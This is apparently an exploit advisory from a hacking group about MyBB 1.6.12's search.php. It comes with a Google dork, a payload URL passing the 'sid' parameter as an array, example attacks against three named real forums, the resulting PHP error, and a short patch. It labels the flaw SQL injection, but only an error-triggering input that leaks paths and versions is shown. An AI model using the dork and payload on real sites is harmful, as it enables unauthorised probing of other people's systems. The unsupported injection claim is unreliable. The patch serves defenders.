**************************************************
IIIIIIII RRRRRRRRRRRR HHHHHHHH HHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRRRRRRRR HHHHHHHHHHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIIIIIII RRRRRRRR RRRRRR HHHHHHHH HHHHHHHH
***************************************************
# Exploit Title: MYBB 1.6.12 search.php Sql injection
# Google Dork: intext:"powered by Mybb"
# Date: Feb 14, 2014
# Exploit Author: MR.XpR
# Tested on: 7 , Kali
# Screen Shot : http://uploaderx.persiangig.com/C/mybb_sqli_error.png
# Software Link : http://resources.mybb.com/downloads/mybb_1612.zip
# Version: 1.6.12
# Vendor Site : http://mybb.com
***************************************************
Exploit :
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
Demo :
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
Error :
Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19
-1~dotdeb.1 (Linux)
Exm :
http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
***************************************************
How To patch :
edit search.php and find this line :
$sid = $db->escape_string($mybb->input['sid']);
change this line to :
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
TnX To :
MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3Z4,3is@
,Mr.a!
i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member
./IRaNHaCK.org